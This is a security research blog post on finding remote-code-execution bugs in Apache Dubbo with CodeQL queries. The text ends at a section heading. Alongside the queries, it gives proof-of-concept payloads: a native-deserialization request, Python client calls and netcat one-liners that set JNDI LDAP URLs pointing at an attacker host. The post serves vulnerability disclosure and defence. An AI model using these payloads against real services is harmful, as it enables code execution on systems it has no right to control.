skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
September 21, 2021

Apache Dubbo: All roads lead to RCE

Alvaro Munoz

During an audit of Apache Dubbo v2.7.8 source code, I found multiple vulnerabilities enabling attackers to compromise and run arbitrary system commands on both Dubbo consumers and providers. I’ve been planning a blog post for awhile (and was encouraged by all the Twitter feedback), but it was delayed when I found four new RCEs that I reported to the Apache Dubbo project - I wanted to make sure they had ample time to remediate them.

CodeQL is GitHub’s semantic code analysis engine that lets you query code as though it were data, allowing you to find variants of a given vulnerability pattern. In this blog post, I’ll summarize the process I used to find these vulnerabilities and how I used CodeQL, not as an automated scanner to find occurrences of a specific vulnerability pattern, but rather as an audit oracle which helped me answer questions about the codebase as I was exploring it. This is not a blog post about performing variant analysis or writing a query to detect the issues I previously found through manual review, but rather about leveraging CodeQL as a codebase exploration tool to accelerate my audit. As you’ll see throughout this post, the issues I found could have been found by CodeQL automatically if third-party libraries such as Netty or Apache curator were modelled by CodeQL libraries which was not the case at the time of the audit.

I assume that you have a basic level of familiarity with CodeQL. We won’t get into the details of most of the queries but they’re straightforward enough to be understood by anyone with a basic knowledge of CodeQL.

Dubbo 101: what is it and who uses it

Apache Dubbo is a high-performance, Java-based, open-source RPC framework with over 35K stars on GitHub. It’s one of the most popular Apache Foundation projects.

The main components of the Dubbo architecture are:

architecture

The providers can expose their services using a variety of protocols, but by default they use the Dubbo binary protocol, which uses a single long-lived connection and NIO asynchronous communication on top of the Netty framework (the transport layer can also be configured to use Grizzly or Mina instead).

dubbo protocol

As you can see in the diagram above, the binary Dubbo protocol uses five bits to specify the serialization format to be used and then includes the RPC method name, serialized arguments, and attachments as part of the request body. More about this later on.

Past vulnerabilities

Apache Dubbo has a fairly recent history of deserialization vulnerabilities:

New vulnerabilities

During the process of auditing Dubbo and using CodeQL as an audit oracle, I identified multiple and varied new deserialization vulnerabilities that could lead to pre-auth remote code execution (RCE):

GHSL CVE Title
GHSL-2021-035 CVE-2021-25641 Bypass Hessian2 allowlist via alternative protocols
GHSL-2021-036 No CVE assigned Pre-auth RCE via multiple Hessian deserializations in the RPC invocation decoder (GHSL-2021-036)
GHSL-2021-037 CVE-2021-30179 Pre-auth RCE via Java deserialization in the Generic filter
GHSL-2021-038 CVE-2021-30179 Pre-auth RCE via arbitrary bean manipulation in the Generic filter
GHSL-2021-039 CVE-2021-32824 Pre-auth RCE via arbitrary bean manipulation in the Telnet handler
GHSL-2021-040 CVE-2021-30180 RCE on customers via Tag route poisoning (unsafe YAML unmarshaling)
GHSL-2021-041 CVE-2021-30180 RCE on customers via Condition route poisoning (unsafe YAML unmarshaling)
GHSL-2021-042 CVE-2021-30181 RCE on customers via Script route poisoning (Nashorn script injection)
GHSL-2021-043 CVE-2021-30180 RCE on providers via Configuration poisoning (unsafe YAML unmarshaling)
GHSL-2021-094 CVE-2021-36162 RCE on customers via MeshApp route poisoning (unsafe YAML unmarshaling)
GHSL-2021-095 CVE-2021-36163 Pre-auth unsafe Hessian deserialization when Hessian protocol is used
GHSL-2021-096 No CVE assigned Pre-auth unsafe Java deserialization when RMI protocol is used
GHSL-2021-097 CVE-2021-37579 Bypass checkSerialization security control

CVE-2021-25641 was independently discovered by Checkmarx researcher Dor Tumarkin who already shared a nice write up about this issue so I won’t be covering it in detail.

First things first: identifying the attack surface

When facing a new codebase, especially one as large as Dubbo (107.7 kLOC), it’s very convenient to focus your audit efforts on the most critical security features, including authentication and authorization and also every piece of code an attacker can interact with. This is commonly referred to as the attack surface of the application. I like to have a clear idea of the attack surface of the application, which I think of as all the doors to the application that I’m able to knock on with my inputs. When the application is relatively small, this can be accomplished by manually reviewing the source code. But Apache Dubbo is too large to effectively enumerate the available attack surface by hand, and reviewing the entirety of the source code would be a time-consuming task. So I’ll use CodeQL instead.

CodeQL defines a data flow source type called RemoteFlowSource, which represents the data that an attacker would be able to tamper with. Assuming that any user-controlled input is potentially attacker-controlled. I can ask my CodeQL oracle for all the classes that contain either an expression or parameter which can introduce such user-controlled data:

import java
import semmle.code.java.dataflow.FlowSources

from RemoteFlowSource source
where
  not source.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  source,
  source.getEnclosingCallable().getDeclaringType(),
  source.getSourceType()

From the architecture diagram, it seems like the most interesting attack surface will be the provider transport layer (Netty by default). But I would also expect additional attack surfaces for the other supported protocols (Hessian, RMI, HTTP, REST, GRPC, REDIS, etc,)

The query only returns ten results though:

attack surface

Looking at the results, it seems that CodeQL identified input sources in:

However, I can’t find any remote flow sources representing the Dubbo protocol entry points. If I were to run an automatic scan on the Dubbo codebase, the results would be incomplete since I’m lacking models for the Dubbo protocol network layer. If you read through the Dubbo Protocol documentation, you can see that Dubbo can use multiple NIO frameworks to handle the communication between providers and consumers including Netty, Grizzly, and Mina:

transport layer

These frameworks will basically decode the request’s body, create an RPC invocation object, and dispatch it to the right service handler. I need to model how these transporters introduce the network data into the application. Since the default transporter is Netty, I’ll model it and leave the others as an exercise for readers.

Netty Model

Netty is a NIO client server framework that enables quick and easy development of network applications. In a nutshell, Netty defines pipelines where the user can register inbound and outbound handlers. I’m interested in the inbound ones and, in particular, I need to consider the second argument to io.netty.channel.ChannelInboundHandler.channelRead(ChannelHandlerContext ctx, Object msg) as a remote flow source. In addition, reading through the documentation, I can see that there is a special type of inbound handler that decodes the bytes received from the socket, so I need to model the second argument to io.netty.handler.codec.ByteToMessageDecoder.decode(ChannelHandlerContext ctx, ByteBuf in, List<Object> out) as a remote flow source too.

Modeling them with CodeQL is straightforward. I just need to extend the RemoteFlowSource and indicate what expression, or in this case parameter, I want to treat as a source of untrusted data. For example, for the ChannelInboundHandler read methods:

import java
import semmle.code.java.dataflow.FlowSources

/** The ChannelInboundHandler class */
class ChannelInboundHandler extends Class {
  ChannelInboundHandler() {
    this.getASourceSupertype*().hasQualifiedName("io.netty.channel", "ChannelInboundHandler")
  }
}

/** The ChannelInboundHandlerl.channelRead method */
class ChannelReadMethod extends Method {
  ChannelReadMethod() {
    this.getName() = ["channelRead", "channelRead0", "messageReceived"] and
    this.getDeclaringType() instanceof ChannelInboundHandler
  }
}

/** The ChannelInboundHandlerl.channelRead(1) source */
class ChannelReadSource extends RemoteFlowSource {
  ChannelReadSource() {
    exists(ChannelReadMethod m |
      this.asParameter() = m.getParameter(1)
    )
  }
  override string getSourceType() { result = "Netty Handler Source" }
}

Re-running the attack surface query with the new sources returns more complete and promising results:

Netty sources

These results provide a starting point to look for vulnerabilities. And, as it turns out, both CVE-2020-11995 and CVE-2020-1948 are deserialization vulnerabilities in Dubbo’s decoding of the incoming packet into an RPC Invocation object.

Pre-auth RCE via multiple Hessian deserializations in the RPC invocation decoder (GHSL-2021-036)

The previous query gave us a few methods to analyze and track where the user-controlled data can go. Observing how data flowed from the Netty adapters, I found multiple Hessian deserialization operations. Some of them were described in CVE-2020-11995 and CVE-2020-1948, but others were different variants. I decided to run a variant analysis using CodeQL and, as I’ll explain below, it returned many new variants that I reported to the Dubbo maintainers as GHSL-2021-036. The way Apache Dubbo addressed CVE-2020-11995 and CVE-2020-1948 was by enabling an opt-in Hessian type filter which, if enabled, could also protect against these new variants. Even though there was an existing opt-in mitigation, we decided to report these new paths so the Dubbo team was aware of them. These new paths proved useful later on in this research. If you use Dubbo, make sure to enable this filter and apply an allow list to only allow the deserialization of known and expected good types.

These findings are a great example of how important it is to understand the attack surface and entry points to an application. By reading the high level description of the Dubbo protocol or by looking into the past vulnerabilities found, you may get the wrong idea that an attacker can only control RPC invocation objects or maybe a generic request. But the reality is that an attacker can make packets be interpreted in different ways and by different parts of the application. For example, if the received bytes do not start with the 0xADBB magic number, the request will be handled by TelnetCodec.decode() (super.decode()), which opens up a new attack surface for the attacker:

decode method

Similarly, requests starting with the Dubbo magic number are handled by ExchangeCodec.decodeBody():

decodeBody method

Since an attacker is in complete control of the request bytes, there is nothing stopping them from sending not just requests but also responses, heartbeats, events, and so on, thus widely increasing their attack surface in terms of code that is parsing their controlled content.

The vulnerabilities found so far (CVE-2020-11995 and CVE-2020-1948) were located in the DecodeableRpcInvocation.decode() method:

  1. Request ->DecodeableRpcInvocation.decode()

However, reading the code, it seems there may be places other than the decoding of an RPC invocation where unsafe deserialization could happen. I’ll be using ObjectInput abstraction as my sink since at this point I don’t care about which serializer is being used. With that, I can ask the CodeQL oracle for unsafe deserialization dataflows using the following parameters:

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class InsecureConfig extends TaintTracking::Configuration {
  InsecureConfig() { this = "InsecureConfig" }

  override predicate isSource(DataFlow::Node source) {
    exists(Method m |
      m.getName() = "decodeBody" and
      m.getDeclaringType().hasQualifiedName("org.apache.dubbo.rpc.protocol.dubbo", "DubboCodec") and
      m.getParameter(1) = source.asParameter()
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(Call call |
      call.getCallee().getName().matches("read%") and
      call.getCallee()
        .getDeclaringType()
        .getASourceSupertype*()
        .hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput") and
      call.getQualifier() = sink.asExpr()
    )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node n1, DataFlow::Node n2) {
    exists(MethodAccess ma |
      ma.getMethod().getName() = "deserialize" and
      ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.dubbo.common.serialize", "Serialization") and
      ma.getArgument(1) = n1.asExpr() and
      ma = n2.asExpr()
    )
  }
}

from InsecureConfig conf, DataFlow::PathNode source, DataFlow::PathNode sink
where conf.hasFlowPath(source, sink)
select sink, source, sink, "unsafe deserialization"

This query returns eight results that are true positive variants of the reported ones:

variants

These results are alternative ways to trigger unsafe deserialization operations and should be accounted for. Otherwise, they may become ways to circumvent future mitigations implemented to protect against unsafe deserialization attacks. They can be summed up as:

  1. HeartBeat Request-> decodeHeartbeatData -> decodeEventData -> in.readEvent -> in.readObject

  2. Event Request-> decodeEventData -> in.readEvent -> in.readObject

  3. OK Response-> DecodeableRpcResult.decode() -> handleValue -> readObject

  4. OK Response-> DecodeableRpcResult.decode() -> handleException leads tBo readThrowable which leads to readObject

  5. OK Response-> DecodeableRpcResult.decode() -> handleAttachment leads to readAttachments which leads to `readObject

  6. OK HeartBeat Response-> decodeHeartbeatData -> decodeEventData -> in.readEvent -> in.readObject

  7. OK Event Response-> decodeEventData -> in.readEvent -> in.readObject

  8. NOK Response-> in.readUTF (in Hessian, readUTF can lead to readObject)

Pre-auth RCE via Java native deserialization in the Generic filter (GHSL-2021-037)

As an additional check, I also want to ask the oracle for all the places where the ObjectInput abstraction is used to deserialize data, regardless whether it is coming from decodeBody(), as you saw in the previous example, or somewhere else. For that purpose, I’ll use the following query:

import java

class ObjectInputClass extends RefType {
  ObjectInputClass() {
    this.getASourceSupertype*().hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput")
  }
}

class ReadObjectCall extends Call {
  ReadObjectCall() {
    exists(Method m |
      this.getCallee() = m and
        m.getName().matches("read%") and
        m.getDeclaringType() instanceof ObjectInputClass
    )
  }
}

from ReadObjectCall call
where
  not call.getEnclosingCallable().getDeclaringType() instanceof ObjectInputClass and
  not call.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  call,
  call.getEnclosingCallable(),
  call.getEnclosingCallable().getDeclaringType()

The above query looks for calls to read.* methods on an object implementing the ObjectInput interfaces, which are not located in test files or in the ObjectInput class itself. It returns 14 results

Most of these calls are performed on an ObjectInput object that is returned by the Serialization.deserialize() method. However, the instance of Serialization is normally returned by the CodecSupport.getSerialization() method:

getSerialization method

This is a very important piece of code. The Dubbo protocol allows callers to specify the serialization protocol, which from an attacker perspective is very convenient. An attacker can specify the Java native serialization type and make the opt-in Hessian type filter useless! However, before blindly switching to whatever serialization type is specified by the user, Dubbo will check against the one expected by the server and will throw an exception if the client tries to use the native Java deserializers. As we saw in CVE-2021-25641, an attacker is still able to force the use of other unsafe deserializers, but in the latest Dubbo versions these serializers are not available in the classpath by default. This is still an insecure pattern since those dependencies (for example, Kryo) could be included in the classpath transitively by a third-party dependency, in which case the Dubbo provider would be vulnerable. Considering that a) Hessian has an opt-in type filter, b) Java native deserialization cannot be arbitrarily specified by a client and c) other unsafe deserialization types are not available in the classpath, we can consider that a deserialization operation using the Serialization instance returned by CodecSupport.getSerialization() will be “secure” or at least there will be ways to make it secure. Using that knowledge, I can refine my query to discard results flowing through CodecSupport.getSerialization():

brand new variants

This time, the query returns results in only two classes: GenericFilter and RedisProtocol

The RedisProtocol doesn’t seem to be supported and trying to use it to export a service will throw an exception:

RedisProtocol

However, reviewing this class made me aware of the RMIProtocol and HessianProtocol which in turn led to the GHSL-2021-095 and GHSL-2021-096 findings.

GenericFilter is a default-installed filter extension, similar to Servlet filters but operating on the RPC invocations before they are finally dispatched to the right provider service. This particular filter handles generic invocations, which are mainly used when the client does not have an API interface or model class. These invocations use the generic $invoke and $invokeAsync method names and will use the Java Reflection API to call the user-specified service. In addition, the caller also needs to set an RPC attachment specifying how the arguments should be decoded. The possible values are:

An attacker is in control of this RPC attachment and setting it to nativejava will force the native Java deserialization of the byte array located in the third argument:

GenericFilter native java deserialization

For example, the following code will prepare an RPC request which will trigger the Java deserialization sink:

// 1.dubboVersion
out.writeString("2.7.8");
// 2.path
out.writeString("org.apache.dubbo.samples.basic.api.DemoService");
// 3.version
out.writeString("");
// 4.methodName
out.writeString("$invoke");
// 5.methodDesc
out.writeString("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;");
// 6.paramsObject
out.writeString("sayHello");
out.writeObject(new String[] {"java.lang.String"});
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(&lt;DESERIALIZATION PAYLOAD BYTE[]>);
out.writeObject(new Object[] {baos.toByteArray()});
// 7.map
HashMap map = new HashMap();
map.put("generic", "nativejava");
out.writeObject(map);

Note that to successfully exploit this issue, an attacker needs to know a service and method name to reach the GenericFilter code (for example, org.apache.dubbo.samples.basic.api.DemoService and sayHello in the above proof of concept), which could be a problem. Remember how when analyzing the attack surface, I found out that I could reach a TelnetCodec? Well, it turns out this is well documented and that it allows an attacker to trivially figure out a valid service/method name pair by connecting to the Dubbo protocol port and issuing an unauthenticated ls command. This info can then be used to craft the final deserialization attack:

$ telnet localhost 20880
Trying ::1...
Connected to localhost.
Escape character is '^]'.

dubbo> ls

PROVIDER:
org.apache.dubbo.samples.basic.api.DemoService

dubbo> cd org.apache.dubbo.samples.basic.api.DemoService

Used the org.apache.dubbo.samples.basic.api.DemoService as default.
You can cancel default service by command: cd /

dubbo> ls

Use default service org.apache.dubbo.samples.basic.api.DemoService.
org.apache.dubbo.samples.basic.api.DemoService (as provider):
    sayHello

Pre-auth RCE via arbitrary bean manipulation in the Generic filter (GHSL-2021-038)

If you were following along carefully, you will have noticed that there were other allowed types for encoding the generic service invocation arguments:

protobuf-json uses Google protobufs, which are normally considered secure since they do not allow attackers to instantiate arbitrary types. However, the true, raw.return and bean could be of interest for an attacker and could allow them to run arbitrary methods.

For the case where generic attachment is either true or raw.return, the PojoUtils.realize() method will be invoked:

PojoUtils realize call

This method accepts an argument where the attacker can provide a HashMap containing a special "class" key to specify the class to be instantiated:

"class" attribute

The rest of the map entries will be used to populate the instantiated type either by invoking a setter, if available, or by using reflection:

newInstance call

Therefore, given the existence of an RCE setter gadget in the provider’s classpath, an attacker will be able to execute arbitrary code.

For example, using the following python client, you can instantiate an org.apache.xbean.propertyeditor.JndiConverter bean (if the gadget is available in the classpath) and call its setAsText method, which will in turn result in the invocation of a JNDI lookup call that can be used to run arbitrary Java code:

  client.send_request_and_return_response(
      service_name="org.apache.dubbo.samples.basic.api.DemoService",
      method_name='$invoke',
      param_types="Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;",
      service_version="",
      args=["sayHello", ["java.lang.String"], [{"class": "org.apache.xbean.propertyeditor.JndiConverter", "asText": "ldap://&lt;attacker_server>/foo"}]],
      attachment={"generic":"raw.return"})

In a similar way, you can set the generic attachment to bean to reach the following code:

bean deserizalization

In this case, JavaBeanSerializeUtil.deserialize() will also allow us to invoke default constructors of arbitrary classes and then call setters or set field values for the constructed objects.

deserialize method

getSetter call

For example, using the Python client, you can send the following request, which will result in an arbitrary JNDI lookup call leading to RCE:

  beanDescriptor=new_object(
        'org.apache.dubbo.common.beanutil.JavaBeanDescriptor',
        className="org.apache.xbean.propertyeditor.JndiConverter",
        type=7,
        properties={"asText": "ldap://&lt;attacker_server>/foo"}
        )
  return client.send_request_and_return_response(
      service_name="org.apache.dubbo.samples.basic.api.DemoService",
      method_name='$invoke',
      param_types="Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;",
      service_version="",
      args=["sayHello", ["java.lang.String"], [beanDescriptor]],
      attachment={"generic":"bean"})

These custom deserializers also support serialization of Maps. For those cases, a new HashMap is created and the user-controlled items are put on it. This allows an attacker to also utilize gadgets not initiated by a setter call but by a hashcode() call (invoked to check that elements pushed into a HashMap are not equal), which extends the gadget surface and enables gadget chains contained only on the Dubbo default classpath.

Pre-auth RCE via arbitrary bean manipulation in the Telnet handler (GHSL-2021-039)

Both PojoUtils and JavaBeanSerializeUtil are custom Dubbo deserializers, so the immediate question is, are they used somewhere else? CodeQL can help answer this question:

realize calls

You’ve already seen their uses on GenericFilter, CompatibleFilter and GenericImplFilter with provider responses that should not be under attacker control. MockInvoker is used for tests, but there is a remaining result that looks interesting: InvokeTelnetHandler.

Turns out that you can also use the Telnet protocol to perform RPC invocations, and the documentation clearly states that:

When there is parameter overload, or the type conversion fails, you can specify the class to be converted by adding the class attribute

Therefore, an attacker with access to the Telnet port (the same one as the Dubbo protocol port) can query the available services and invoke any of them. In this process, an attacker will be able to instantiate arbitrary classes and invoke arbitrary setters and hashcode() on them.

This finding is quite interesting since when searching for information about the telnet port I found a write up for CVE-2020-1948 that explains a vulnerability in the DecodeableRpcInvocation class but then talks about the Dubbo Telnet protocol and how it uses FastJSON to parse the method invocation JSON data. Since FastJSON allows the use of type discriminators (@type), a similar vulnerability affected older versions of Dubbo. For example:

echo "invoke org.apache.dubbo.samples.basic.api.DemoService.sayHello(({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.85.1:8089/test_by_cqq", "autoCommit": true }) | nc -i 1 dubbo_server 20880

The vulnerability (with no CVE that I know of) was addressed by enabling the FastJSON block list, but passing a map as an argument, the deserialized map is later processed by PojoUtils.realize which enables the same attack. eg:

echo "invoke org.apache.dubbo.samples.basic.api.DemoService.sayHello({'class':'org.apache.xbean.propertyeditor.JndiConverter','asText': 'ldap://attacker/foo'})" | nc -i 1 dubbo_server 20880

RCEs via unsafe YAML unmarshalling (GHSL-2021-040, GHSL-2021-041 and GHSL-2021-043)

Another good practice when reviewing code is to look for hazardous APIs used throughout the application, regardless of having solid evidence that they can be exercised with untrusted data. This analysis will show us “hot” classes in the application that should be reviewed carefully. For this purpose I like to use the CodeQL sink collection. You can think of it as using just the isSink predicates of the CodeQL TaintTracking configurations. This is something that should be done for most of the vulnerability categories. The result should be a map of what classes do file IO operations, which ones write data to HTTP responses, which ones perform deserialization operations, and so on. You can use such a map to guide and focus your audit on what are likely to be high-yield areas of the code base. To keep this blog short(er), I’ll show you how I enumerated an auditing heat map just for the unsafe deserialization category.

import java
import semmle.code.java.security.UnsafeDeserializationQuery

from UnsafeDeserializationSink node
where
  not node.getLocation().getFile().getRelativePath().matches("%/src/test/%")
select
  node.asExpr().getParent().(Call).getCallee().getDeclaringType(), // deserializing class
  node.asExpr().getParent(), // deserializing method
  node.asExpr().getParent().(Call).getEnclosingCallable().getDeclaringType() // enclosing class

In the above query, I’m importing the UnsafeDeserialization library that defines an UnsafeDeserializationSink DataFlow node. I will be querying all the nodes that satisfy the UnsafeDeserialiationSink predicate and are not located in test files. The query returns 23 results. Ignoring those on classes implementing the ObjectInput interface (since I already showed you how to analyze them), I get three results; three potentially insecure YAML deserialization operations:

YAML.load calls

I can manually review where the data passed to these methods comes from, or I can use a simple DataFlow query to let CodeQL do the review for us:

import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.FlowSources
import DataFlow
import PartialPathGraph

class PartialTaintConfig extends DataFlow::Configuration {
  PartialTaintConfig() { this = "PartialTaintConfig" }
  
  override int explorationLimit() { result = 5 }
  
  override predicate isSource(DataFlow::Node source) {
    none()
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma |
        ma.getMethod().hasName("load") and
        ma.getMethod().getDeclaringType().hasName("Yaml") and
        sink.asExpr() = ma.getAnArgument()
    )
  }
}

from PartialPathNode n, int dist
where
  any(PartialTaintConfig c).hasPartialFlowRev(n, _, dist) and
  n.getNode() instanceof DataFlow::ExplicitParameterNode and
  dist > 0
select dist, n

The query looks for reverse partial data flows. That is, starting from the sink and within the exploration limits set in the query (5), it looks backwards toward a potential source for all the expressions or parameters leading to the sink. This kind of query is very useful when looking for APIs that are not propagating the taint and need to be modeled but also when you need to “hoist” a sink. You can think of hoisting or lifting a sink as a way to find all other methods that, if invoked with tainted data, will propagate that taint to the sink and therefore can also be considered sinks themselves.

My intention with this query was to look for places where the data deserialized by Yaml.load() can come from. The results show 11 possible paths:

YAML.load hoisted

You can see that there are several results labeled as event[content], which means that the flow would originate from the content field of the event parameter.For example:

process method

You can see how the content of the ConfigChangedEvent flows into the ConditionRuleParser.parse() method which is then passed to the final Yaml.load() sink. The process() method overrides the ConfigurationListener.process() method:

configuration listener

This interface looks very interesting since it represents a configuration center listener. The ConfigChangedEvent will contain the contents of that change. This means that if an attacker can add or modify certain configurations or routes in the registry, then all the consumers will parse those changes and will potentially trigger an unsafe deserialization that could be used to compromise all the different consumers.

I’ll verify this by writing a simple query to check where these ConfigChangedEvents are instantiated:

import java

from ClassInstanceExpr call
where call.getConstructedType().getName() = "ConfigChangedEvent"
select call

I’m returned a list of the following classes:

These classes are listeners that listen for changes in different configuration centers and are abstracted by the ConfigurationListener interface.

If an attacker can access any of these registries or configuration centers, they will be able to inject malicious YAML content that when passed to Dubbo consumers and providers will trigger arbitrary code execution. You might think that accessing these configuration managers isn’t possible, but the truth is that most of them run with no authentication/authorization enabled by default, and in some cases it may be possible to bypass, as I showed previously.

Using this approach, I found that it was indeed possible to achieve RCE by performing:

RCE on customers via script route poisoning (Nashorn script injection) (GHSL-2021-042)

pokemon

You may be wondering if this newly identified attack surface (configuration manager listeners) introduces other injection issues. You could either model all the configuration manager client libraries (Apache Curator, Nacos, etc) or just model the Dubbo abstraction layer for all of them. Turns out that all the different listeners are derived from the ConfigurationListener or the NotifyListener. You can use this info to create a source representing this attack surface with CodeQL:

import java
import semmle.code.java.dataflow.FlowSources

class NotifyListener extends RefType {
  NotifyListener() {
    this.hasQualifiedName("org.apache.dubbo.registry", "NotifyListener")
  }
}

class ConfigurationListener extends RefType {
  ConfigurationListener() {
    this.hasQualifiedName("org.apache.dubbo.common.config.configcenter", "ConfigurationListener")
  }
}

class ConfigurationListenerProcessMethod extends Method {
  ConfigurationListenerProcessMethod() {
    this.getName() = "process" and
    this.getDeclaringType().getASupertype*() instanceof ConfigurationListener
  }
}

class NotifyListenerNotifyMethod extends Method {
  NotifyListenerNotifyMethod() {
    this.getName() = "notify" and
    this.getDeclaringType().getASupertype*() instanceof NotifyListener
  }
}

class DubboListener extends RemoteFlowSource {
  DubboListener() {
    (exists(NotifyListenerNotifyMethod m |
        this.asParameter() = m.getAParameter()
      ) or
      exists(ConfigurationListenerProcessMethod m |
        this.asParameter() = m.getAParameter()
      )) and
      not this.getLocation().getFile().getAbsolutePath().matches("%/src/test/%")
  }
  override string getSourceType() { result = "Dubbo Listener Source" }
}

from DubboListener l
select
  l,
  l.asParameter().getCallable(),
  l.asParameter().getCallable().getDeclaringType()

The above query gets us the following new entry points:

new CC entrypoints

Running a complete CodeQL scan with this new source returns brand new results, including an unsafe server-side Javascript evaluation on ScriptRouter:

Script injection

Consulting the documentation reveals that routing rules can be scripted with any of the scripting languages available in the JDK. Similar to what I showed you for the YAML deserialization, an attacker with access to a non-authenticated registry can register a new scripted route that all consumers will download and evaluate:

exploit

Master @threedr3am already wrote about exploiting my finding, so I won’t provide more details here. After all, this blog post is about the discovery process, not the exploitation one.

Review of CVE-2021-25641 mitigations

After reporting all the previous vulnerabilities to the Apache Dubbo and Apache Security teams, I was notified about the fixes implemented in v2.7.9. I was not given the opportunity to review the fix before it was released, so when I was told that the fix was already released I was curious about the remediation approach the Dubbo team took and took a look.

To reject the processing of untrusted data that tries to set a serialization type that is different from the one explicitly enabled by the server (as in GHSL-2021-035), Apache Dubbo 2.7.9 implemented the following main mitigations:

  1. There is a new CodecSupport.getSerialization(url) method that instead of forbidding changing the serialization type to native Java will only use server-side specified deserialization format and won’t allow any changes.
  2. All security checks to prevent use of the native Java protocol in CodecSupport.getSerialization(url, id) were removed and partly moved into CodecSupport.checkSerialization(path, version, serializationType);
  3. Additionally, there is an InputStream length validation in CodecSupport.decodeEventData but nowhere else.

Two new properties control the new security checks:

If you remembered, CodecSupport.getSerialization(url, id) was the main reason I was discarding some results before. Every deserialization operation on a Serialization instance returned by that method was guaranteed to use the server-side specified serialization protocol that would normally be Hessian. Removing that check from CodecSupport.getSerialization(url, id) means that I need to reevaluate my previous findings. Specifically I want to know if there are any deserialization operations going through the now unsafe getSerialization(url, id) overload but not through any serialization.security.check controls.

From a design standpoint, I would think that enforcing the security check within the method returning the serializer is a more secure approach than splitting it into a new method since developers may forget to explicitly invoke the security check. This looks like yet another great question to ask my CodeQL oracle.

Let’s highlight the main difference between versions lower than v2.79 and 2.7.9:

getSerialization

In versions lower than 2.7.9, any call to CodecSupport.deserialize() or to Serialization.deserialize() on a Serialization instance returned by CodecSupport.getSerialization(URL, id) will check that the consumer/attacker is not changing the serialization format to any dangerous Java native serialization format. Therefore, Dubbo is not enforcing the use of the provider-defined format, but neither can you arbitrarily change it to the Java format.

getSerialization overload

In 2.7.9, things are a little bit different. There is a new CodecSupport.getSerialization(URL) overload that will enforce the use of the provider-defined serialization format. This will normally be Hessian, which can be configured securely. However, the old CodecSupport.getSerialization(URL, id) overload has been stripped out of any security checks. Even worse, the CodecSupport.deserialize() method uses the unsafe overload.

On the other hand, a new CodecSupport.checkSerialization() method was added to carry out the security checks:

checkSerialization method

I’m going to re-evaluate the query from GHSL-2021-036 but will add a sanitizer to treat checks for the new serialization.security.check and deserialization.event.size properties as cleansing nodes. Note that deserialization.event.size with the default size (50 bytes) may still allow for denial-of-service (DoS) attacks.

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class InsecureConfig extends TaintTracking::Configuration {

  InsecureConfig() { this = "InsecureConfig" }

  override predicate isSource(DataFlow::Node source) {
    exists(Method m |
        m.getName() = "decodeBody" and
        m.getDeclaringType()
            .hasQualifiedName("org.apache.dubbo.rpc.protocol.dubbo", "DubboCodec") and
        m.getParameter(1) = source.asParameter()
     )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node n1, DataFlow::Node n2) {
    exists(MethodAccess ma |
      ma.getMethod().getName() = "deserialize" and
      ma.getMethod()
          .getDeclaringType()
          .hasQualifiedName("org.apache.dubbo.common.serialize", "Serialization") and
        ma.getArgument(1) = n1.asExpr() and
        ma = n2.asExpr()
    )
  }

  override predicate isSanitizer(DataFlow::Node node) {
    exists(MethodAccess ma |
        ma.getMethod().getName() = ["getBoolean”, “getInt"] and
        ma.getAnArgument().(CompileTimeConstantExpr).getStringValue() = ["serialization.security.check”, “deserialization.event.size"] and
        ma.getAnEnclosingStmt().getBasicBlock().bbDominates(node.asExpr().getBasicBlock())
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma |
        ma.getMethod().getName().matches("read%") and
        ma.getMethod()
            .getDeclaringType()
            .getASourceSupertype*()
            .hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput") and
        ma.getQualifier() = sink.asExpr()
    )
  }
}

from InsecureConfig conf, DataFlow::PathNode source, DataFlow::PathNode sink
where conf.hasFlowPath(source, sink)
select sink, source, sink, ""

This query is exactly the same as the GHSL-2021-036 one but with a new sanitizer predicate to the dataflow configuration:

  override predicate isSanitizer(DataFlow::Node node) {
    exists(MethodAccess ma |
        ma.getMethod().getName() = ["getBoolean”, “getInt"] and
        ma.getAnArgument().(CompileTimeConstantExpr).getStringValue().regexpMatch("serialization.security.check|deserialization.event.size") and
        ma.getAnEnclosingStmt().getBasicBlock().bbDominates(node.asExpr().getBasicBlock())
    )
  }

The new query returns no results, meaning that all variants found in GHSL-2021-036 are now behind checks for these new properties. This kind of query is useful when added to the CI/CD pipeline, so you can verify that new PRs don’t introduce new vulnerabilities by deserializing untrusted data on paths not guarded by these checks. The next step would be to review those checks and see if they can be bypassed.

Pre-auth unsafe Java deserialization (bypass of checkSerialization control) (GHSL-2021-097)

If I ask the oracle for all the places where these properties are used:

import java

from MethodAccess ma
where ma.getAnArgument().(CompileTimeConstantExpr).getStringValue() = ["serialization.security.check", "deserialization.event.size"]
select ma

you can see that there are three places where these checks are enforced:

DecodeableRpcResult.decode

DecodeableRpcResult.decode method

